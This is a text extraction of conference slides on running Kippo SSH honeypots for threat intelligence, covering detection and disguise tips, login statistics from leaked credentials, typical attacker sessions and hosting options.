Upload
chp1n
View
207
Download
1
Tags:
Embed Size (px)
Citation preview
Honey PotzETHAN DODGE (CHP1N)
Disclaimer
The views expressed herein are solely my views and not the views of my employer, or any other organization with which I am associated. I am responsible for the content of this presentation.
Likewise, the research conducted and illustrated herein was performed by me unless otherwise noted.
Audience
lNoobs.lDon't be afraid to ask questions!
lThose looking to get into the honey pot/threat intelligence communities.lThose that already have experience honey potting.
Honey PotzBEWARE OF ADDICTION
Why Honey Pots?
Threat Intel?
Threat Intel?
Types of Honey PotsJUST A MORSEL OF HUNNY
HoneyDrive
Bruteforce.gr
KippoDionaeaHoneydGlastopfConpotThug
Kippo-GraphHoneyd-VizDionaeaFRELK Stack
Low Interaction vs. High Interaction
•Actual machine
•Complete functionality
•Can exploit whatever is
exploitable
•Used to observe targeted attacks
•Not easily detectable
•Bifrozt
•Simulation
•Incomplete functionality
•Cannot be used to exploit other
vulnerabilities
•Used to observe behavior
•Often easily detectable
•Kippo
KippoTHE GOOD AND THE BAD
“Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.”
https://github.com/desaster/kippo
How Kippo Works
How To Detecet Kippo
How To Detecet Kippo
Simple Ways To “Hide” It
•Change the hostname•Add a login banner•Edit userdb.txt•Change file system•Edit /etc/passwd & /etc/shadow•Edit script output
Findings
Login Attempts vs Successes in the past 30 days - LA
Total attempts: 519Total successes: 10
Total attempts: 3,924Total successes: 2
Creds
•Default root/123456 (Top Graph)•Leaked 14 character password (Bottom Graph)
“Leaking” Creds
•Leaked 14 character password to honeypot of pastebin•Posted at 1:14 AM MST•Any guesses as to how long it took until someone logged in?
2 Hours 35 Minutes
•First login seen with correct password seen at 3:49 MST.•Romanian IP Address
•Malicious intent•Pastebin has over 100 views in 2 minutes (Bots)•Saw 5 logins from 3 distinct IP addresses in 12 hours
Login Attempts vs Successes in the past 30 days - Canada
Total attempts: 255,059Total successes: 79
Total attempts: 282,263Total successes: 0
Hosting Problems
You get what you pay for.(Cloud At Cost)
Changed userdb.txt
•Rejects most common 100 passwords from the most common 10 usernames (Top Graph)
•Therefore accepting multiple passwords•Accepts 7 character password from 5 different usernames
•Yet to be cracked •Leaked in a key logger dump this morning at 7:53 MST
Changed fs.pickle
•Spun up an Ubuntu box serving DNS•Used createfs.py to create new fs.pickle•Yet to see better results
•I will blog about it
Login Attempts vs Successes in the past 30 days - Europe
Total attempts: 429,661Total successes: 0
Most attacked box
•In the heart of the EU•Doesn’t get attacked as much as Asian honeypots
•8 character password•Logon banner in Spanish
Typical malicious session
•Wget/curl some script or executable•Chmod it•Execute it•Delete it•99% of the time is scripted
Occasional you’ll get a lot more commands
Typical Detection
•Runs ps –a, ifconfig, or cats a standard file•Sees default Kippo content•Hops out
Kippo VisualizationTHE OLD AND THE NEW
Kippo-Graph
Kippo-Graph
Kippo-Graph
Tango Honeypot Intelligence
@Brian_Warehime
Demo Time
Downloads
•Original Kippo: https://github.com/desaster/kippo•Kippo fork I use: https://github.com/micheloosterhof/kippo
•Supports SFTP and json logging•Is updated regularly
•Download Tango: https://apps.splunk.com/app/2666/•Download Honeydrive: http://sourceforge.net/projects/honeydrive/
Hosting Links
•Crissic – crissic.net ($10/year)lLA and Florida
•Cloud At Cost – cloudatcost.com ($35/life)lCanada
•Time4VPS – Time4VPS (€10/year)lEuropean Union
•Lowendstock.com•Lowendtalk.com
@Andrew__Morris
@Brian_Warehime
@micheloosterhof
@da_667
@Threat_Inc
Contact
Freenode: chp1nTwitter: @chp1nBlog: utzpin.org
el fin.